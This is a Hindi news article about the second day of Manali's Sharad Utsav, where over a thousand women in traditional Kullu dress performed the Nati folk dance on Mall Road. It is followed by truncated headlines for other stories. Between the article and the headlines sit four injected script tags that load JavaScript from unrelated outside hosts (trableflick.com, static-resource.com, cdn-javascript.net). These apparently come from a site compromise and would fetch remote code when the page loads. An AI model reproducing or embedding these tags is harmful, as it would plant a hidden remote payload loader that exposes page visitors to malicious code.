<p>मनाली के पांच दिवसीय राष्ट्र स्तरीय शरदोत्सव के दूसरे दिन शुक्रवार को माल रोड पर सैकड़ों महिलाओं ने पारंपरिक परिधानों में कुल्लवी लोकनृत्य नाटी का खूबसूरत प्रदर्शन किया। इस महानाटी में मनाली विधानसभा क्षेत्र के लेफ्ट बैंक इलाके के 60 से अधिक महिला मंडलों की एक हजार से ज्यादा सदस्यों ने भाग लिया। पारंपरिक कुल्लवी सफेद पट्टू, लाल ढाठू और आभूषणों से सजी इन महिलाओं ने पारंपरिक वाद्य यंत्रों की धुनों पर नाटी डालकर विभिन्न प्रदेशों के लोक कलाकारों तथा देश-विदेश के पर्यटकों को अपनी समृद्ध लोक संस्कृति से रूबरू करवाया। इस अद्भुत सांस्कृतिक आयोजन का शुभारंभ वन, परिवहन, युवा सेवाएं एवं खेल मंत्री गोविंद सिंह ठाकुर ने किया।</p>
<p>उन्होंने बताया कि शरदोत्सव के चैथे दिन रविवार को भी महानाटी आयोजित की जाएगी, जिसमें मनाली विधानसभा क्षेत्र के राईट बैंक क्षेत्र के महिला मंडल की महिलाएं भाग लेंगी। वे पारंपरिक काले रंग एवं खूबसूरत डिजाइन वाले कुल्लवी पट्टू के साथ लोकनृत्य करेंगी। इस बीच शरदोत्सव के दूसरे दिन मनाली की मनु रंगशाला और माल रोड में कई सांस्कृतिक कार्यक्रम आयोजित किए गए। स्थानीय लोगों के अलावा देश-विदेश के पर्यटकों ने इन कार्यक्रम का भरपूर आनंद लिया।</p>
<p> </p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8620x” type=”text/javascript”></script>
<script src=”http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8620x&format=arrjs&r=1578048259439″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&title=a&blocks[]=31af2″ type=”text/javascript”></script>
पांच आईएएस अधिकारियों के तबादला और नियुक्ति आदेश क्लिक करें और पढें पूरी सूची Shimla:…
धर्मशाला। हिमाचल प्रदेश स्कूल शिक्षा बोर्ड परीक्षाओं के पैटर्न में बड़े बदलाव की तैयारी…
मंडी के रखोह के कलोह गांव की घटना मृतक वार्ड पंच और पत्नी थी आशा…
Shimla: सरकार ने तीन आईपीएस और 2 एचपीएस के तबादला और नियुक्ति आदेश जारी…
Sangrur: खनौरी बॉर्डर पर किसान ने फंदा लगाकर आत्महत्या कर ली है। मरने वाले…
सवाल नगर निगम ने खुद 7000 अवैध निर्माण चिन्हित किया था। क्या सब पर बुलडोजर…